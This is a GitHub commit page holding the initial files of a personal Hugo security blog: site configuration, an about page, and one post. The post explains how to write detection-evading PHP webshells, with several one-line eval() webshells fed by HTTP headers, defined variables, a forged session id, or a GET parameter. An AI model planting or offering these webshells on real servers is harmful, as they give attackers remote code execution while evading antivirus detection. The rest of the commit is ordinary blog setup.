Skip to content
Permalink
Browse files

rname repo name

  • Loading branch information...
Y4er committed Jul 11, 2019
0 parents commit aa125d7b9ecede3aa6e4ad0a324540126c0d6668
Showing 352 changed files with 20,858 additions and 0 deletions.
@@ -0,0 +1,2 @@
public/
hugo.exe
@@ -0,0 +1,3 @@
[submodule "themes/even"]
path = themes/even
url = https://github.com/olOwOlo/hugo-theme-even.git
@@ -0,0 +1,5 @@
hugo+even+netlify构建的个人博客

http://Y4er.com

记录生活和笔记。
@@ -0,0 +1,11 @@
---
title: "{{ replace .TranslationBaseName "-" " " | title }}"
date: {{ .Date }}
lastmod: {{ .Date }}
draft: false
tags: []
categories: []
comment: true
---

<!--more-->
@@ -0,0 +1,209 @@
baseURL = "https://y4er.com/"
languageCode = "zh-cn"
defaultContentLanguage = "zh-cn" # en / zh-cn / ... (This field determines which i18n file to use)
title = "Y4er的博客 | 伪程序员,信安爱好者,专注于网络攻防和信息安全"
preserveTaxonomyNames = true
enableRobotsTXT = true
enableEmoji = true
theme = "even"
enableGitInfo = true # use git commit log to generate lastmod record # 可根据 Git 中的提交生成最近更新记录。

# Syntax highlighting by Chroma. NOTE: Don't enable `highlightInClient` and `chroma` at the same time!
pygmentsOptions = "linenos=table"
pygmentsCodefences = true
pygmentsUseClasses = true
pygmentsCodefencesGuessSyntax = true

hasCJKLanguage = true # has chinese/japanese/korean ? # 自动检测是否包含 中文\日文\韩文
paginate = 8 # 首页每页显示的文章数
disqusShortname = "" # disqus_shortname
googleAnalytics = "UA-131218098-1" # UA-XXXXXXXX-X
copyright = "" # default: author.name ↓ # 默认为下面配置的author.name ↓

[author] # essential # 必需
name = "Y4er"

[sitemap] # essential # 必需
changefreq = "weekly"
priority = 0.5
filename = "sitemap.xml"

[[menu.main]] # config your menu # 配置目录
name = "主页"
weight = 10
identifier = "home"
url = "/"
[[menu.main]]
name = "归档"
weight = 20
identifier = "archives"
url = "/post/"
[[menu.main]]
name = "关于"
weight = 30
identifier = "about"
url = "/about/"
[[menu.main]]
name = "碎碎念"
weight = 40
identifier = "words"
url = "/words/"

[params]
version = "4.x" # Used to give a friendly message when you have an incompatible update
debug = false # If true, load `eruda.min.js`. See https://github.com/liriliri/eruda

since = "2018" # Site creation time # 站点建立时间
# use public git repo url to link lastmod git commit, enableGitInfo should be true.
# 指定 git 仓库地址,可以生成指向最近更新的 git commit 的链接,需要将 enableGitInfo 设置成 true.
gitRepo = "https://github.com/Y4er/Y4er.github.io"

# site info (optional) # 站点信息(可选,不需要的可以直接注释掉)
logoTitle = "Y4er" # default: the title value # 默认值: 上面设置的title值
keywords = ["Y4er","信息安全","网络安全","红蓝攻防","渗透测试","bypass","waf","注入","黑客","chabug"]
description = "伪程序员,信安爱好者,专注于网络攻防和信息安全."

# paginate of archives, tags and categories # 归档、标签、分类每页显示的文章数目,建议修改为一个较大的值
archivePaginate = 20

# show 'xx Posts In Total' in archive page ? # 是否在归档页显示文章的总数
showArchiveCount = true

# The date format to use; for a list of valid formats, see https://gohugo.io/functions/format/
dateFormatToUse = "2006-01-02"

# show word count and read time ? # 是否显示字数统计与阅读时间
moreMeta = true

# Syntax highlighting by highlight.js
highlightInClient = false

# 一些全局开关,你也可以在每一篇内容的 front matter 中针对单篇内容关闭或开启某些功能,在 archetypes/default.md 查看更多信息。
# Some global options, you can also close or open something in front matter for a single post, see more information from `archetypes/default.md`.
toc = true # 是否开启目录
autoCollapseToc = true # Auto expand and collapse toc # 目录自动展开/折叠
fancybox = true # see https://github.com/fancyapps/fancybox # 是否启用fancybox(图片可点击)

# mathjax
mathjax = false # see https://www.mathjax.org/ # 是否使用mathjax(数学公式)
mathjaxEnableSingleDollar = false # 是否使用 $...$ 即可進行inline latex渲染
mathjaxEnableAutoNumber = false # 是否使用公式自动编号
mathjaxUseLocalFiles = false # You should install mathjax in `yout-site/static/lib/mathjax`

postMetaInFooter = true # contain author, lastMod, markdown link, license # 包含作者,上次修改时间,markdown链接,许可信息
linkToMarkDown = false # Only effective when hugo will output .md files. # 链接到markdown原始文件(仅当允许hugo生成markdown文件时有效)
contentCopyright = '<a rel="license noopener" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank">CC BY-NC-ND 4.0</a>' # e.g. '<a rel="license noopener" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank">CC BY-NC-ND 4.0</a>'

changyanAppid = "" # Changyan app id # 畅言
changyanAppkey = "" # Changyan app key

livereUID = "" # LiveRe UID # 来必力

baiduPush = true # baidu push # 百度
baiduAnalytics = "150ef5faf0461b9f83612d60d72b86b1" # Baidu Analytics
baiduVerification = "PsCl6huhUk" # Baidu Verification
googleVerification = "gPHyyln9EbiXF7wv-nBpX50vJcwJbi1KKbUyFOxuVkA" # Google Verification # 谷歌

# Link custom CSS and JS assets
# (relative to /static/css and /static/js respectively)
customCSS = []
customJS = []

uglyURLs = false # please keep same with uglyurls setting

[params.publicCDN] # load these files from public cdn # 启用公共CDN,需自行定义
enable = true
jquery = '<script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>'
slideout = '<script src="https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js" integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin="anonymous"></script>'
fancyboxJS = '<script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js" integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin="anonymous"></script>'
fancyboxCSS = '<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css" integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin="anonymous">'
timeagoJS = '<script src="https://cdn.jsdelivr.net/npm/timeago.js@3.0.2/dist/timeago.min.js" integrity="sha256-jwCP0NAdCBloaIWTWHmW4i3snUNMHUNO+jr9rYd2iOI=" crossorigin="anonymous"></script>'
timeagoLocalesJS = '<script src="https://cdn.jsdelivr.net/npm/timeago.js@3.0.2/dist/timeago.locales.min.js" integrity="sha256-ZwofwC1Lf/faQCzN7nZtfijVV6hSwxjQMwXL4gn9qU8=" crossorigin="anonymous"></script>'
flowchartDiagramsJS = '<script src="https://cdn.jsdelivr.net/npm/raphael@2.2.7/raphael.min.js" integrity="sha256-67By+NpOtm9ka1R6xpUefeGOY8kWWHHRAKlvaTJ7ONI=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/flowchart.js@1.8.0/release/flowchart.min.js" integrity="sha256-zNGWjubXoY6rb5MnmpBNefO0RgoVYfle9p0tvOQM+6k=" crossorigin="anonymous"></script>'
sequenceDiagramsCSS = '<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/bramp/js-sequence-diagrams@2.0.1/dist/sequence-diagram-min.css" integrity="sha384-6QbLKJMz5dS3adWSeINZe74uSydBGFbnzaAYmp+tKyq60S7H2p6V7g1TysM5lAaF" crossorigin="anonymous">'
sequenceDiagramsJS = '<script src="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.js" integrity="sha256-4O4pS1SH31ZqrSO2A/2QJTVjTPqVe+jnYgOWUVr7EEc=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/snapsvg@0.5.1/dist/snap.svg-min.js" integrity="sha256-oI+elz+sIm+jpn8F/qEspKoKveTc5uKeFHNNVexe6d8=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/underscore@1.8.3/underscore-min.js" integrity="sha256-obZACiHd7gkOk9iIL/pimWMTJ4W/pBsKu+oZnSeBIek=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/gh/bramp/js-sequence-diagrams@2.0.1/dist/sequence-diagram-min.js" integrity="sha384-8748Vn52gHJYJI0XEuPB2QlPVNUkJlJn9tHqKec6J3q2r9l8fvRxrgn/E5ZHV0sP" crossorigin="anonymous"></script>'

# Display a message at the beginning of an article to warn the readers that it's content may be outdated.
# 在文章开头显示提示信息,提醒读者文章内容可能过时。
[params.outdatedInfoWarning]
enable = false
hint = 30 # Display hint if the last modified time is more than these days ago. # 如果文章最后更新于这天数之前,显示提醒
warn = 180 # Display warning if the last modified time is more than these days ago. # 如果文章最后更新于这天数之前,显示警告

[params.gitment] # Gitment is a comment system based on GitHub issues. see https://github.com/imsun/gitment
owner = "" # Your GitHub ID
repo = "" # The repo to store comments
clientId = "" # Your client ID
clientSecret = "" # Your client secret

[params.utterances] # https://utteranc.es/
owner = "Y4er" # Your GitHub ID
repo = "Y4er.github.io" # The repo to store comments

[params.gitalk] # Gitalk is a comment system based on GitHub issues. see https://github.com/gitalk/gitalk
owner = "" # Your GitHub ID
repo = "" # The repo to store comments
clientId = "" # Your client ID
clientSecret = "" # Your client secret

# Valine.
# You can get your appid and appkey from https://leancloud.cn
# more info please open https://valine.js.org
[params.valine]
enable = false
appId = '你的appId'
appKey = '你的appKey'
notify = false # mail notifier , https://github.com/xCss/Valine/wiki
verify = false # Verification code
avatar = 'mm'
placeholder = '说点什么吧...'
visitor = false

[params.flowchartDiagrams]# see https://blog.olowolo.com/example-site/post/js-flowchart-diagrams/
enable = false
options = ""

[params.sequenceDiagrams] # see https://blog.olowolo.com/example-site/post/js-sequence-diagrams/
enable = false
options = "" # default: "{theme: 'simple'}"

[params.busuanzi] # count web traffic by busuanzi # 是否使用不蒜子统计站点访问量
enable = false
siteUV = true
sitePV = true
pagePV = true

[params.reward] # 文章打赏
enable = true
wechat = "/img/reward/wechat.png" # 微信二维码
alipay = "/img/reward/alipay.png" # 支付宝二维码

[params.social] # 社交链接
a-email = "mailto:admin@chabug.org"
g-github = "https://github.com/Y4er"
o-bilibili = "https://space.bilibili.com/131568325"

# See https://gohugo.io/about/hugo-and-gdpr/
[privacy]
[privacy.googleAnalytics]
anonymizeIP = true # 12.214.31.144 -> 12.214.31.0
[privacy.youtube]
privacyEnhanced = true

# 将下面这段配置取消注释可以使 hugo 生成 .md 文件
# Uncomment these options to make hugo output .md files.
#[mediaTypes]
# [mediaTypes."text/plain"]
# suffixes = ["md"]
#
#[outputFormats.MarkDown]
# mediaType = "text/plain"
# isPlainText = true
# isHTML = false
#
#[outputs]
# home = ["HTML", "RSS"]
# page = ["HTML", "MarkDown"]
# section = ["HTML", "RSS"]
# taxonomy = ["HTML", "RSS"]
# taxonomyTerm = ["HTML"]
@@ -0,0 +1,69 @@
---
title: "一个菜鸡的简介"
date: 2018-12-16T12:11:25+08:00
---
<center>

![](https://y4er.com/img/uploads/20190430191344.png)

ID:`Y4er`

团 队:[`ChaBug`](http://www.chabug.org/)

Email:`admin[@]chabug.org`

Github: [Y4er](http://github.com/Y4er)

学历:专科 (计应 · 在读)

</center>

## 爱好

对网络安全领域有强烈兴趣,喜欢钻研最新安全技术。

喜欢复现各种漏洞,偶尔打打CTF,平常没事写写代码,看看电影,~~有钱的话~~会时不时出来旅游。

---

## 技能

1. 熟悉web常见漏洞及原理
2. 熟练使用metasploit、burp、sqlmap等常见辅助工具
3. 能够独立完成中小型网站的渗透测试
4. 可以使用python、php编写脚本辅助渗透测试
5. 具有最基本的php代码审计能力[还在学]
6. ~~内网 域渗透方向[还在学]~~

目前专注于php代码审计及实战。

**特别特别想在毕业之后从事安全行业!**

---

## 项目

[Django-Blog](https://github.com/Y4er/Django-blog):我的第二个使用Django开发的Blog

[webscan](https://github.com/Y4er/webscan):使用python3+django2开发的web扫描项目

[secwiki](https://github.com/Y4er/secwiki):一个文章聚合知识本地化的项目

都拿不出手,先放这吧。

## 原创文章
[记一次由百度云会员引起的渗透](https://y4er.com/post/faka-hack/)

[记一次渗透之从后台到提权](https://y4er.com/post/pentest-03-12/)

[Python模块学习之Logging日志模块](https://www.chabug.org/code/640.html)

## 证书

2018、2019年VR虚拟现实设计制作高职组省赛二等奖 (无关安全方向)

2019年第四届河南省高校信息安全大赛ISCC线下赛一等奖

---

博客部署状态[![Netlify Status](https://api.netlify.com/api/v1/badges/ef493264-2fef-4671-958f-fba416b2dd12/deploy-status)](https://app.netlify.com/sites/y4er/deploys)
@@ -0,0 +1,57 @@
---

title: "PHP利用Apache、Nginx的特性实现免杀Webshell"
date: 2019-01-25T21:20:47+08:00
lastmod: 2019-01-25T21:20:47+08:00
draft: false
tags: ['apache','nginx','shell','bypass']
categories: ['code']
comment: true
---

`get_defined_vars()``getallheaders()`是两个特性函数,我们可以通过这两个函数来构造我们的webshell。
前几天看到的,一直忘记写,填坑。
<!--more-->

| 环境 | 函数 | 用法 |
| :----: | :------------------: | :------------------------------: |
| nginx | `get_defined_vars()` | 返回由所有已定义变量所组成的数组 |
| apache | `getallheaders()` | 获取全部 HTTP 请求头信息 |

## apache环境

```php
<?php
eval(next(getallheaders()));
?>
```

![](https://y4er.com/img/uploads/20190509161475.jpg)

## apache和nginx环境通用

```php
<?php
eval(implode(reset(get_defined_vars())));
?>
```

![](https://y4er.com/img/uploads/20190509164784.jpg)
另外一种通过执行伪造的sessionid值,进行任意代码执行。

```php
<?php
eval(hex2bin(session_id(session_start())));
?>
```

![](https://y4er.com/img/uploads/20190509166713.jpg)

`706870696e666f28293b`这个是`phpinfo();`的hex编码。

## 给shell加密码

```php
<?php eval(get_defined_vars()['_GET']['cmd']);?>
```

0 comments on commit aa125d7

Please sign in to comment.
You can’t perform that action at this time.